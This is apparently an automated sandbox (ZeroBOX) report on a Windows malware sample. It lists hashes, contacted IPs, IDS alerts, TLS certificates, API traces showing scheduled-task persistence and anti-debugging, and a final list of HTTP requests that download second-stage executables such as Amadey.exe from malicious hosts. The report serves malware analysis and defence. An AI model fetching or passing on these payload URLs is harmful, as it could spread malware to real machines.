Summary | ZeroBOX

Random.exe

Emotet Gen1 Generic Malware Malicious Library Antivirus UPX Malicious Packer CAB PE64 AntiDebug MSOffice File PNG Format OS Processor Check JPEG Format PE32 PE File .NET EXE AntiVM DLL
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 19, 2023, 7:47 a.m. Oct. 19, 2023, 7:55 a.m.
Size 1.1MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 191febed315d7c3a620b564e99e5f3cc
SHA256 be598baeed48aa13f42daed457b938ba19ee75c081a3571c582815822df7121a
CRC32 C8E8586E
ssdeep 24576:A4G/xo8crC7yRjvOwKS87o9ugbalGaRlnMMS:A4Gu8hyRjvKH7o8gbKbS
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)

IP Address Status Action
104.194.128.170 Active Moloch
104.20.67.143 Active Moloch
104.21.32.208 Active Moloch
104.21.35.235 Active Moloch
104.21.78.56 Active Moloch
107.167.110.211 Active Moloch
117.18.232.200 Active Moloch
121.254.136.9 Active Moloch
131.153.76.130 Active Moloch
148.251.234.93 Active Moloch
164.124.101.2 Active Moloch
172.67.197.174 Active Moloch
172.67.216.81 Active Moloch
172.86.97.117 Active Moloch
193.42.32.29 Active Moloch
194.169.175.127 Active Moloch
45.130.41.101 Active Moloch
69.48.143.183 Active Moloch
85.143.220.63 Active Moloch
85.217.144.143 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:62576 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related Potentially Bad Traffic
TCP 148.251.234.93:443 -> 192.168.56.103:49165 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 148.251.234.93:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 104.21.32.208:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49166 -> 172.86.97.117:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 172.86.97.117:80 -> 192.168.56.103:49166 2014819 ET INFO Packed Executable Download Misc activity
TCP 69.48.143.183:443 -> 192.168.56.103:49174 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 69.48.143.183:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.86.97.117:80 -> 192.168.56.103:49166 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 172.86.97.117:80 -> 192.168.56.103:49166 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 172.86.97.117:80 -> 192.168.56.103:49166 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 104.20.67.143:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 172.67.216.81:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49171 -> 172.67.197.174:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 104.21.78.56:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49169 -> 85.217.144.143:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 85.217.144.143:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49169 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49176 -> 45.130.41.101:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 85.217.144.143:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 104.21.35.235:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 85.217.144.143:80 -> 192.168.56.103:49169 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.103:49169 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49169 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49168 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.103:49168 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.103:49168 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 85.143.220.63:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.103:49173 -> 85.143.220.63:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 85.143.220.63:80 2031089 ET HUNTING Request to .TOP Domain with Minimal Headers Potentially Bad Traffic
TCP 194.169.175.127:80 -> 192.168.56.103:49172 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.169.175.127:80 -> 192.168.56.103:49172 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 107.167.110.211:443 906200022 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 85.143.220.63:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.143.220.63:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.143.220.63:80 -> 192.168.56.103:49173 2023464 ET HUNTING Possible EXE Download From Suspicious TLD Misc activity
TCP 148.251.234.93:443 -> 192.168.56.103:49217 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
UDP 192.168.56.103:60141 -> 164.124.101.2:53 2047719 ET INFO External IP Lookup Domain (iplogger .com in DNS lookup) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49212 -> 148.251.234.93:443 2047718 ET INFO External IP Lookup Domain (iplogger .com in TLS SNI) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49212 -> 148.251.234.93:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49216 -> 148.251.234.93:443 2047718 ET INFO External IP Lookup Domain (iplogger .com in TLS SNI) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49216 -> 148.251.234.93:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49215 -> 148.251.234.93:443 2047718 ET INFO External IP Lookup Domain (iplogger .com in TLS SNI) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49215 -> 148.251.234.93:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:65119 -> 164.124.101.2:53 2036289 ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) Crypto Currency Mining Activity Detected
TCP 192.168.56.103:49213 -> 148.251.234.93:443 2047718 ET INFO External IP Lookup Domain (iplogger .com in TLS SNI) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49213 -> 148.251.234.93:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2 192.168.56.103:49170 -> 104.21.32.208:443 C=US, O=Let's Encrypt, CN=E1 CN=lycheepanel.info 9f:29:fd:d3:0f:46:b4:fc:1f:d0:06:c7:4e:4d:21:d0:21:08:ea:43
TLS 1.2 192.168.56.103:49164 -> 104.20.67.143:443 C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f
TLS 1.2 192.168.56.103:49167 -> 172.67.216.81:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=flyawayaero.net 34:8b:a3:9d:94:c4:8d:02:5c:e1:f1:43:da:57:49:64:a9:1c:b6:fe
TLS 1.2 192.168.56.103:49171 -> 172.67.197.174:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=*.grabyourpizza.com 19:34:3f:f1:b2:75:20:7f:8a:58:d1:fd:26:b2:74:e2:ea:f8:76:e6
TLS 1.2 192.168.56.103:49179 -> 104.21.78.56:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=diplodoka.net 08:f2:0c:9e:cc:84:cd:91:24:54:d5:fe:5e:3f:a9:46:68:a2:58:33
TLS 1.2 192.168.56.103:49176 -> 45.130.41.101:443 C=US, O=Let's Encrypt, CN=R3 CN=laubenstein.space d4:04:82:56:eb:8d:bb:fd:72:7a:36:fd:90:c1:07:aa:45:ac:92:27
TLS 1.2 192.168.56.103:49178 -> 104.21.35.235:443 C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=potatogoose.com 0f:a9:ea:9d:3e:af:d2:24:68:a0:8f:b7:58:00:c9:0b:f0:7f:31:37
TLS 1.2 192.168.56.103:49180 -> 107.167.110.211:443 C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 C=NO, ST=Oslo, L=Oslo, O=Opera Norway AS, CN=net.geo.opera.com 8b:1e:84:38:9c:97:8c:be:f7:e1:0e:28:14:15:bb:08:cc:fb:ad:af
TLS 1.3 192.168.56.103:49232 -> 131.153.76.130:80 None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "nhdues.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a
DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c
SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c
SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18
MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f
New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x746a77b7
MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15
MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57
tlqjiniq9etqiyllq5loblym+0x1a2e @ 0xef1a2e
tlqjiniq9etqiyllq5loblym+0x22e8 @ 0xef22e8
tlqjiniq9etqiyllq5loblym+0xed98 @ 0xefed98
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x704f3f46
registers.esp: 1372356
registers.edi: 0
registers.eax: 1884241734
registers.ebp: 1372396
registers.edx: 0
registers.ebx: 0
registers.esi: 1884241734
registers.ecx: 7540072
1 0 0

__exception__

stacktrace:
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x755f6de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x755f6e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x778b011a
DialogBoxIndirectParamAorW+0x108 SetDlgItemTextW-0x44 user32+0x3cf5c @ 0x7561cf5c
SoftModalMessageBox+0x757 MessageBoxTimeoutW-0x391 user32+0x6f73c @ 0x7564f73c
SoftModalMessageBox+0xa33 MessageBoxTimeoutW-0xb5 user32+0x6fa18 @ 0x7564fa18
MessageBoxTimeoutW+0x52 MessageBoxTimeoutA-0x9 user32+0x6fb1f @ 0x7564fb1f
New_user32_MessageBoxTimeoutW@24+0x137 New_user32_RegisterHotKey@16-0x80 @ 0x746a77b7
MessageBoxExW+0x1b MessageBoxA-0x9 user32+0x6fd15 @ 0x7564fd15
MessageBoxW+0x18 SetSysColors-0x9 user32+0x6fd57 @ 0x7564fd57
tlqjiniq9etqiyllq5loblym+0x1a2e @ 0xef1a2e
tlqjiniq9etqiyllq5loblym+0x22e8 @ 0xef22e8
tlqjiniq9etqiyllq5loblym+0xed98 @ 0xefed98
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x704f3f46
registers.esp: 1372356
registers.edi: 0
registers.eax: 1884241734
registers.ebp: 1372396
registers.edx: 0
registers.ebx: 0
registers.esi: 1884241734
registers.ecx: 7540072
1 0 0

__exception__

stacktrace:
CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x750bd08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x750b964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x750a4d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x750a6f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x750ae825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x750a6002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x750a5fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x750a49e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x750a5a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x778d9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x778f8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x778f8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x757f7a25
tlqjiniq9etqiyllq5loblym+0x1b6fb @ 0xf0b6fb
tlqjiniq9etqiyllq5loblym+0x1b78d @ 0xf0b78d
tlqjiniq9etqiyllq5loblym+0x1b5c2 @ 0xf0b5c2
tlqjiniq9etqiyllq5loblym+0xee13 @ 0xefee13
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x750d3ef4
registers.esp: 1373364
registers.edi: 0
registers.eax: 5951968
registers.ebp: 1373392
registers.edx: 1
registers.ebx: 0
registers.esi: 3787600
registers.ecx: 1884108156
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 96335116
registers.edi: 8775908
registers.eax: 96335116
registers.ebp: 96335196
registers.edx: 618
registers.ebx: 96335480
registers.esi: 2147746133
registers.ecx: 81507464
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6f12540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6f1252ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6f200ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 64871344
registers.edi: 1974991376
registers.eax: 64871344
registers.ebp: 64871424
registers.edx: 1
registers.ebx: 9031580
registers.esi: 2147746133
registers.ecx: 1925805225
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://172.86.97.117/himeffectivelyproress.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.143/files/Amadey.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.143/files/My2.exe
suspicious_features GET method with no useragent header suspicious_request GET http://galandskiyher5.com/downloads/toolspub1.exe
suspicious_features GET method with no useragent header suspicious_request GET http://gons01b.top/build.exe
suspicious_features GET method with no useragent header suspicious_request GET http://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.194.128.170/svp/Ykwrxaauw.dat
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/HPj0MzD6
suspicious_features GET method with no useragent header suspicious_request GET https://flyawayaero.net/baf14778c246e15550645e30ba78ce1c.exe
